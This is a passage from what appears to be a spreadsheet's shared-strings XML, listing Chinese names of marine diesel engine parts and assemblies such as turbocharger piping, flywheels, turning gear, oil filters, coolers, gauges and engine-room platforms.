    <t xml:space="preserve">扫气空气旁通                                            </t>
  </si>
  <si>
    <t xml:space="preserve">提升附加装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">花纹钢板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">出口管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">扫气集管壳体                                            </t>
  </si>
  <si>
    <t xml:space="preserve">阀板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">固定设备安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">变径管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">隔热外罩                                              </t>
  </si>
  <si>
    <t xml:space="preserve">可移动绝缘盖                                            </t>
  </si>
  <si>
    <t xml:space="preserve">噪音吸收盒                                             </t>
  </si>
  <si>
    <t xml:space="preserve">增压空气管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">增压空气管-板                                           </t>
  </si>
  <si>
    <t xml:space="preserve">测量孔                                               </t>
  </si>
  <si>
    <t xml:space="preserve">减振器壳体                                             </t>
  </si>
  <si>
    <t xml:space="preserve">连接管壳体                                             </t>
  </si>
  <si>
    <t xml:space="preserve">吸气管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">消音器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">吸入管布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">支管                                                </t>
  </si>
  <si>
    <t xml:space="preserve">橡胶插座                                              </t>
  </si>
  <si>
    <t xml:space="preserve">进口管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">过渡管详图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">镀锌板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">钢板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">定距圈                                               </t>
  </si>
  <si>
    <t xml:space="preserve">安全带                                               </t>
  </si>
  <si>
    <t xml:space="preserve">外壳                                                </t>
  </si>
  <si>
    <t xml:space="preserve">泵阀                                                </t>
  </si>
  <si>
    <t xml:space="preserve">扫气空气集管孔                                           </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器箱板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">管接头入口                                             </t>
  </si>
  <si>
    <t xml:space="preserve">冷凝水泄放                                             </t>
  </si>
  <si>
    <t xml:space="preserve">管断面                                               </t>
  </si>
  <si>
    <t xml:space="preserve">辅助鼓风机                                             </t>
  </si>
  <si>
    <t xml:space="preserve">弯管接口                                              </t>
  </si>
  <si>
    <t xml:space="preserve">连接件接口的再加工                                         </t>
  </si>
  <si>
    <t xml:space="preserve">压缩空气旁通阀安装                                         </t>
  </si>
  <si>
    <t xml:space="preserve">补偿器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">空气滤器                                              </t>
  </si>
  <si>
    <t xml:space="preserve">过渡件                                               </t>
  </si>
  <si>
    <t xml:space="preserve">安全头的安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">空气入口防护                                            </t>
  </si>
  <si>
    <t xml:space="preserve">低负荷鼓风机系统                                          </t>
  </si>
  <si>
    <t xml:space="preserve">扫气空气管布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">释放阀安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">释放阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">排气支管夹                                             </t>
  </si>
  <si>
    <t xml:space="preserve">格栅螺栓连接支架                                          </t>
  </si>
  <si>
    <t xml:space="preserve">格栅夹具支架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">焊接挡栅支架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀颈法兰                                            </t>
  </si>
  <si>
    <t xml:space="preserve">填料函密封环                                            </t>
  </si>
  <si>
    <t xml:space="preserve">格栅环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">格栅杆                                               </t>
  </si>
  <si>
    <t xml:space="preserve">增压器后盲板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气集管壳                                             </t>
  </si>
  <si>
    <t xml:space="preserve">隔板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">安装环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">隔板、垫片、定位架                                         </t>
  </si>
  <si>
    <t xml:space="preserve">镀锌铁架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">排气集管节流管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">叉板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">排气集管外壳                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气集管加强环                                           </t>
  </si>
  <si>
    <t xml:space="preserve">加固环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">增压器布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排气管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">排气弯管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">防爆门                                               </t>
  </si>
  <si>
    <t xml:space="preserve">7＋8＋9＃气缸排气管                                       </t>
  </si>
  <si>
    <t xml:space="preserve">1＃缸排气管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">板(成形)                                             </t>
  </si>
  <si>
    <t xml:space="preserve">支承                                                </t>
  </si>
  <si>
    <t xml:space="preserve">夹具管头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">导向法兰                                              </t>
  </si>
  <si>
    <t xml:space="preserve">钢条                                                </t>
  </si>
  <si>
    <t xml:space="preserve">加强筋、加强板                                           </t>
  </si>
  <si>
    <t xml:space="preserve">温度计头/座                                            </t>
  </si>
  <si>
    <t xml:space="preserve">中间法兰                                              </t>
  </si>
  <si>
    <t xml:space="preserve">弯管                                                </t>
  </si>
  <si>
    <t xml:space="preserve">带孔板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">隔热板布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">增压器管系                                             </t>
  </si>
  <si>
    <t xml:space="preserve">绝缘材料                                              </t>
  </si>
  <si>
    <t xml:space="preserve">贯穿螺栓支撑                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀管系                                             </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧片                                               </t>
  </si>
  <si>
    <t xml:space="preserve">绝缘支撑板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">螺钉/螺母装配                                           </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">夹板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">绝缘板支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">中间支撑                                              </t>
  </si>
  <si>
    <t xml:space="preserve">增压器规格                                             </t>
  </si>
  <si>
    <t xml:space="preserve">绝缘板盖                                              </t>
  </si>
  <si>
    <t xml:space="preserve">安全头                                               </t>
  </si>
  <si>
    <t xml:space="preserve">防爆片                                               </t>
  </si>
  <si>
    <t xml:space="preserve">限位                                                </t>
  </si>
  <si>
    <t xml:space="preserve">容器                                                </t>
  </si>
  <si>
    <t xml:space="preserve">干洗铭牌                                              </t>
  </si>
  <si>
    <t xml:space="preserve">水洗铭牌                                              </t>
  </si>
  <si>
    <t xml:space="preserve">2＃气缸排气管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">压气端清洗铭牌                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃烧系统                                              </t>
  </si>
  <si>
    <t xml:space="preserve">辅助空气管安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">火星消灭装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">空气滤网                                              </t>
  </si>
  <si>
    <t xml:space="preserve">膨胀接头样管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">膨胀调整器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">增压器清洗/泄放                                          </t>
  </si>
  <si>
    <t xml:space="preserve">排气管防护罩                                            </t>
  </si>
  <si>
    <t xml:space="preserve">隔振                                                </t>
  </si>
  <si>
    <t xml:space="preserve">连接件再加工                                            </t>
  </si>
  <si>
    <t xml:space="preserve">吊环                                                </t>
  </si>
  <si>
    <t xml:space="preserve">增压器泄放                                             </t>
  </si>
  <si>
    <t xml:space="preserve">三通阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">压气机水清洗                                            </t>
  </si>
  <si>
    <t xml:space="preserve">连接板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">透平侧水清洗                                            </t>
  </si>
  <si>
    <t xml:space="preserve">水清洗阀                                              </t>
  </si>
  <si>
    <t xml:space="preserve">悬挂                                                </t>
  </si>
  <si>
    <t xml:space="preserve">操纵阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">水箱                                                </t>
  </si>
  <si>
    <t xml:space="preserve">板螺钉                                               </t>
  </si>
  <si>
    <t xml:space="preserve">排气消音器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">隔离阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">示功图                                               </t>
  </si>
  <si>
    <t xml:space="preserve">排气管输出端                                            </t>
  </si>
  <si>
    <t xml:space="preserve">增压器后排气管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">快速接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">轮毂                                                </t>
  </si>
  <si>
    <t xml:space="preserve">搭扣                                                </t>
  </si>
  <si>
    <t xml:space="preserve">发电机轴                                              </t>
  </si>
  <si>
    <t xml:space="preserve">端盖上法兰                                             </t>
  </si>
  <si>
    <t xml:space="preserve">上防护                                               </t>
  </si>
  <si>
    <t xml:space="preserve">下防护                                               </t>
  </si>
  <si>
    <t xml:space="preserve">前防护                                               </t>
  </si>
  <si>
    <t xml:space="preserve">防护下法兰                                             </t>
  </si>
  <si>
    <t xml:space="preserve">供油单元上部件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">供油单元下部件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">供油单元支撑                                            </t>
  </si>
  <si>
    <t xml:space="preserve">弹性联轴节                                             </t>
  </si>
  <si>
    <t xml:space="preserve">联轴节防护罩                                            </t>
  </si>
  <si>
    <t xml:space="preserve">HOLSET联轴节                                         </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮毂                                               </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮边缘                                              </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮的修理解决方案                                         </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮防护罩总成                                           </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮防护罩                                             </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮防护罩凸轮                                           </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮附件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮总成                                              </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮指示器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">轴法兰                                               </t>
  </si>
  <si>
    <t xml:space="preserve">法兰毛坯                                              </t>
  </si>
  <si>
    <t xml:space="preserve">筒形销                                               </t>
  </si>
  <si>
    <t xml:space="preserve">轴管                                                </t>
  </si>
  <si>
    <t xml:space="preserve">压板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">内部结构                                              </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承拆分                                            </t>
  </si>
  <si>
    <t xml:space="preserve">齿条总成                                              </t>
  </si>
  <si>
    <t xml:space="preserve">1/2齿条                                             </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮防护附件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">齿形                                                </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮刻度图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮毛坯                                              </t>
  </si>
  <si>
    <t xml:space="preserve">展开的齿轮辋                                            </t>
  </si>
  <si>
    <t xml:space="preserve">行星齿轮                                              </t>
  </si>
  <si>
    <t xml:space="preserve">盘车机                                               </t>
  </si>
  <si>
    <t xml:space="preserve">输出轴                                               </t>
  </si>
  <si>
    <t xml:space="preserve">心轴                                                </t>
  </si>
  <si>
    <t xml:space="preserve">停止，停车                                             </t>
  </si>
  <si>
    <t xml:space="preserve">法兰连接的轴                                            </t>
  </si>
  <si>
    <t xml:space="preserve">分离叉                                               </t>
  </si>
  <si>
    <t xml:space="preserve">带齿的轴                                              </t>
  </si>
  <si>
    <t xml:space="preserve">蜗杆轴                                               </t>
  </si>
  <si>
    <t xml:space="preserve">蜗轮毛坯                                              </t>
  </si>
  <si>
    <t xml:space="preserve">轴承导向装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">盘车机支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮升程                                              </t>
  </si>
  <si>
    <t xml:space="preserve">死点指针                                              </t>
  </si>
  <si>
    <t xml:space="preserve">分离叉支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">分离器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">盘车马达                                              </t>
  </si>
  <si>
    <t xml:space="preserve">盘车机底板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">微动开关                                              </t>
  </si>
  <si>
    <t xml:space="preserve">壁上插座                                              </t>
  </si>
  <si>
    <t xml:space="preserve">盘车安全装置安装                                          </t>
  </si>
  <si>
    <t xml:space="preserve">组合板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">盘车杆                                               </t>
  </si>
  <si>
    <t xml:space="preserve">蜗轮                                                </t>
  </si>
  <si>
    <t xml:space="preserve">电动机                                               </t>
  </si>
  <si>
    <t xml:space="preserve">盘车机总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">起动/盘车机安装                                          </t>
  </si>
  <si>
    <t xml:space="preserve">带降压阀的空气起动器                                        </t>
  </si>
  <si>
    <t xml:space="preserve">污垢分离器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">注油器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">带附件的空气起动器                                         </t>
  </si>
  <si>
    <t xml:space="preserve">直线注油器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">角度剖面                                              </t>
  </si>
  <si>
    <t xml:space="preserve">备件箱                                               </t>
  </si>
  <si>
    <t xml:space="preserve">空气起动电动机                                           </t>
  </si>
  <si>
    <t xml:space="preserve">停车开关                                              </t>
  </si>
  <si>
    <t xml:space="preserve">压力控制阀                                             </t>
  </si>
  <si>
    <t xml:space="preserve">遥控开关                                              </t>
  </si>
  <si>
    <t xml:space="preserve">盘车杆支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">开关阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">齿轮电动机                                             </t>
  </si>
  <si>
    <t xml:space="preserve">死点指示器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">重燃油滤器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">船用柴油滤器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油滤芯                                              </t>
  </si>
  <si>
    <t xml:space="preserve">燃油滤器盖                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滤器部件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滤器外壳                                              </t>
  </si>
  <si>
    <t xml:space="preserve">内部泄放管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">齿轮辋，润滑油滤器                                         </t>
  </si>
  <si>
    <t xml:space="preserve">大齿轮，润滑油滤器                                         </t>
  </si>
  <si>
    <t xml:space="preserve">轴，滑油滤器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">链轮毂                                               </t>
  </si>
  <si>
    <t xml:space="preserve">链罩                                                </t>
  </si>
  <si>
    <t xml:space="preserve">内部滤板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">空气室包装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">盖子把手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">管支架，滑油滤器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">顶环                                                </t>
  </si>
  <si>
    <t xml:space="preserve">底环                                                </t>
  </si>
  <si>
    <t xml:space="preserve">加强板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">检修孔圈                                              </t>
  </si>
  <si>
    <t xml:space="preserve">盖子密封圈                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滑油滤器                                              </t>
  </si>
  <si>
    <t xml:space="preserve">密封滑油滤器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">不等边角钢1                                            </t>
  </si>
  <si>
    <t xml:space="preserve">不等边角钢2                                            </t>
  </si>
  <si>
    <t xml:space="preserve">离心滤器                                              </t>
  </si>
  <si>
    <t xml:space="preserve">虑筒                                                </t>
  </si>
  <si>
    <t xml:space="preserve">滤网                                                </t>
  </si>
  <si>
    <t xml:space="preserve">滑油控制阀                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滑油滤器垫片                                            </t>
  </si>
  <si>
    <t xml:space="preserve">吸滤器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">滑油冷却器.安装                                          </t>
  </si>
  <si>
    <t xml:space="preserve">带锁环的导块                                            </t>
  </si>
  <si>
    <t xml:space="preserve">管子，金属板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滑油板式冷却器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器结构板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">淡水板式冷却器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器外罩                                             </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器元件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">压力板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">滑油和淡水冷却器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">喷嘴油冷却器，板                                          </t>
  </si>
  <si>
    <t xml:space="preserve">注油器的调整                                            </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄销                                               </t>
  </si>
  <si>
    <t xml:space="preserve">负荷装置安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">注油器支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">注油器体                                              </t>
  </si>
  <si>
    <t xml:space="preserve">油量调节螺钉                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滑油分配器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">注油器轴                                              </t>
  </si>
  <si>
    <t xml:space="preserve">螺纹管接头                                             </t>
  </si>
  <si>
    <t xml:space="preserve">关节臂                                               </t>
  </si>
  <si>
    <t xml:space="preserve">联轴器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">调节杆                                               </t>
  </si>
  <si>
    <t xml:space="preserve">键导向块                                              </t>
  </si>
  <si>
    <t xml:space="preserve">主控制单元                                             </t>
  </si>
  <si>
    <t xml:space="preserve">备份控制单元                                            </t>
  </si>
  <si>
    <t xml:space="preserve">主控制单元电路板                                          </t>
  </si>
  <si>
    <t xml:space="preserve">备份控制单元电路板                                         </t>
  </si>
  <si>
    <t xml:space="preserve">待用单元电路板                                           </t>
  </si>
  <si>
    <t xml:space="preserve">齿轮法兰                                              </t>
  </si>
  <si>
    <t xml:space="preserve">气缸外壳                                              </t>
  </si>
  <si>
    <t xml:space="preserve">执行器活塞                                             </t>
  </si>
  <si>
    <t xml:space="preserve">伺服阀体                                              </t>
  </si>
  <si>
    <t xml:space="preserve">伺服阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">液压单元（块）                                           </t>
  </si>
  <si>
    <t xml:space="preserve">压力计软管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">小型温度计                                             </t>
  </si>
  <si>
    <t xml:space="preserve">便携式压力计                                            </t>
  </si>
  <si>
    <t xml:space="preserve">土耳其语铭牌                                            </t>
  </si>
  <si>
    <t xml:space="preserve">冰岛语铭牌                                             </t>
  </si>
  <si>
    <t xml:space="preserve">压力计接头                                             </t>
  </si>
  <si>
    <t xml:space="preserve">通用仪表                                              </t>
  </si>
  <si>
    <t xml:space="preserve">压差阀布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">远程显示连接                                            </t>
  </si>
  <si>
    <t xml:space="preserve">衬套支撑                                              </t>
  </si>
  <si>
    <t xml:space="preserve">压力测量管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">压力测量系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">压力表列表                                             </t>
  </si>
  <si>
    <t xml:space="preserve">丹麦语说明铭牌                                           </t>
  </si>
  <si>
    <t xml:space="preserve">英语说明铭牌                                            </t>
  </si>
  <si>
    <t xml:space="preserve">法语说明铭牌                                            </t>
  </si>
  <si>
    <t xml:space="preserve">西班牙语说明铭牌                                          </t>
  </si>
  <si>
    <t xml:space="preserve">葡萄牙语说明铭牌                                          </t>
  </si>
  <si>
    <t xml:space="preserve">俄语说明铭牌                                            </t>
  </si>
  <si>
    <t xml:space="preserve">波兰语说明铭牌                                           </t>
  </si>
  <si>
    <t xml:space="preserve">意大利语说明铭牌                                          </t>
  </si>
  <si>
    <t xml:space="preserve">德语说明铭牌                                            </t>
  </si>
  <si>
    <t xml:space="preserve">转速计                                               </t>
  </si>
  <si>
    <t xml:space="preserve">说明铭牌毛坯                                            </t>
  </si>
  <si>
    <t xml:space="preserve">压差计                                               </t>
  </si>
  <si>
    <t xml:space="preserve">压力计面板护罩                                           </t>
  </si>
  <si>
    <t xml:space="preserve">橡胶离合器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">P140的压力表                                          </t>
  </si>
  <si>
    <t xml:space="preserve">温度计                                               </t>
  </si>
  <si>
    <t xml:space="preserve">仪表板支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">后板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">水洗罐铭牌                                             </t>
  </si>
  <si>
    <t xml:space="preserve">压力表面板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">压力计                                               </t>
  </si>
  <si>
    <t xml:space="preserve">温度计列表                                             </t>
  </si>
  <si>
    <t xml:space="preserve">压力表                                               </t>
  </si>
  <si>
    <t xml:space="preserve">法兰板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">软管                                                </t>
  </si>
  <si>
    <t xml:space="preserve">带钢                                                </t>
  </si>
  <si>
    <t xml:space="preserve">开关手柄                                              </t>
  </si>
  <si>
    <t xml:space="preserve">报警开关                                              </t>
  </si>
  <si>
    <t xml:space="preserve">铁座板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">油滤器仪表板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滑油泵端盖                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滑油泵壳                                              </t>
  </si>
  <si>
    <t xml:space="preserve">自锁螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">连接齿轮                                              </t>
  </si>
  <si>
    <t xml:space="preserve">功率输出PTO                                           </t>
  </si>
  <si>
    <t xml:space="preserve">埋头螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">功率输出PTO轴                                          </t>
  </si>
  <si>
    <t xml:space="preserve">滑油泵                                               </t>
  </si>
  <si>
    <t xml:space="preserve">调节螺钉指南                                            </t>
  </si>
  <si>
    <t xml:space="preserve">适配器，连接器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">压力控制器壳体                                           </t>
  </si>
  <si>
    <t xml:space="preserve">前端接线箱总成                                           </t>
  </si>
  <si>
    <t xml:space="preserve">前端接线箱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">法兰装配                                              </t>
  </si>
  <si>
    <t xml:space="preserve">油温电子模块装配                                          </t>
  </si>
  <si>
    <t xml:space="preserve">前端接线箱返工                                           </t>
  </si>
  <si>
    <t xml:space="preserve">前端接线箱连接图                                          </t>
  </si>
  <si>
    <t xml:space="preserve">螺旋桨                                               </t>
  </si>
  <si>
    <t xml:space="preserve">滚动轴承                                              </t>
  </si>
  <si>
    <t xml:space="preserve">海水冷却泵总成                                           </t>
  </si>
  <si>
    <t xml:space="preserve">角接触                                               </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水原理图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">泵特性                                               </t>
  </si>
  <si>
    <t xml:space="preserve">燃气进管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">燃气进入单元                                            </t>
  </si>
  <si>
    <t xml:space="preserve">单向阀保持螺钉                                           </t>
  </si>
  <si>
    <t xml:space="preserve">连接法兰装配                                            </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮装配                                              </t>
  </si>
  <si>
    <t xml:space="preserve">螺栓连接的进气管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">废气支管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">增压器切断阀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">喷嘴管端盖                                             </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器化学清洗管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">喷嘴管衬套导管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">毛坯板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器导轨                                             </t>
  </si>
  <si>
    <t xml:space="preserve">轮子支架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">拉拔工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器清洗帘                                            </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器清洗枪                                            </t>
  </si>
  <si>
    <t xml:space="preserve">增压器清洗系统                                           </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器清洗工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器工具                                             </t>
  </si>
  <si>
    <t xml:space="preserve">后部上部支架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧上部支架                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧中部支架                                           </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧下部支架                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧下部支架                                           </t>
  </si>
  <si>
    <t xml:space="preserve">端部支架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">自由端支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">专用支架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">支架焊接                                              </t>
  </si>
  <si>
    <t xml:space="preserve">吊车梁                                               </t>
  </si>
  <si>
    <t xml:space="preserve">行车梁安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">立柱                                                </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮侧上层走台                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧上层走台                                           </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮侧中层走台                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧中层走台                                           </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮侧下层走台                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧下层走台                                           </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴箱内部走台                                           </t>
  </si>
  <si>
    <t xml:space="preserve">扫气集管处走台                                           </t>
  </si>
  <si>
    <t xml:space="preserve">带梯子的平台                                            </t>
  </si>
  <si>
    <t xml:space="preserve">底板和盖板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀支撑布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">保护圈                                               </t>
  </si>
  <si>
    <t xml:space="preserve">铜轴颈环                                              </t>
  </si>
  <si>
    <t xml:space="preserve">活塞支撑环                                             </t>
  </si>
  <si>
    <t xml:space="preserve">板盖环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀支撑环                                            </t>
  </si>
  <si>
    <t xml:space="preserve">地面格栅                                              </t>
  </si>
  <si>
    <t xml:space="preserve">工字梁                                               </t>
  </si>
  <si>
    <t xml:space="preserve">停活塞阀梁                                             </t>
  </si>
  <si>
    <t xml:space="preserve">特殊装配                                              </t>
  </si>
  <si>
    <t xml:space="preserve">承压梁                                               </t>
  </si>
  <si>
    <t xml:space="preserve">联结防护罩                                             </t>
  </si>
  <si>
    <t xml:space="preserve">示功凸轮的防护罩                                          </t>
  </si>
  <si>
    <t xml:space="preserve">顶层凸轮侧平台                                           </t>
  </si>
  <si>
    <t xml:space="preserve">直连接板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">角度连接板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮侧上部支架安装                                         </t>
  </si>
  <si>
    <t xml:space="preserve">格栅外形图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带扶手的格栅支架框架                                        </t>
  </si>
  <si>
    <t xml:space="preserve">梯子                                                </t>
  </si>
  <si>
    <t xml:space="preserve">带扶手的格栅支架                                          </t>
  </si>
  <si>
    <t xml:space="preserve">带框架的格栅支架                                          </t>
  </si>
  <si>
    <t xml:space="preserve">平台                                                </t>
  </si>
  <si>
    <t xml:space="preserve">栏杆，扶手                                             </t>
  </si>
  <si>
    <t xml:space="preserve">方法兰                                               </t>
  </si>
  <si>
    <t xml:space="preserve">椭圆形法兰                                             </t>
  </si>
  <si>
    <t xml:space="preserve">焊接法兰                                              </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴坯材料                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滑动法兰                                              </t>
  </si>
  <si>
    <t xml:space="preserve">方垫                                                </t>
  </si>
  <si>
    <t xml:space="preserve">椭圆垫                                               </t>
  </si>
  <si>
    <t xml:space="preserve">对焊法兰                                              </t>
  </si>
  <si>
    <t xml:space="preserve">连接件                                               </t>
  </si>
  <si>
    <t xml:space="preserve">管螺纹接头                                             </t>
  </si>
  <si>
    <t xml:space="preserve">焊接接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">接头体                                               </t>
  </si>
  <si>
    <t xml:space="preserve">膨胀塞                                               </t>
  </si>
  <si>
    <t xml:space="preserve">保护列表                                              </t>
  </si>
  <si>
    <t xml:space="preserve">长推力轴                                              </t>
  </si>
  <si>
    <t xml:space="preserve">止动架                                               </t>
  </si>
  <si>
    <t xml:space="preserve">推力块支架                                             </t>
  </si>
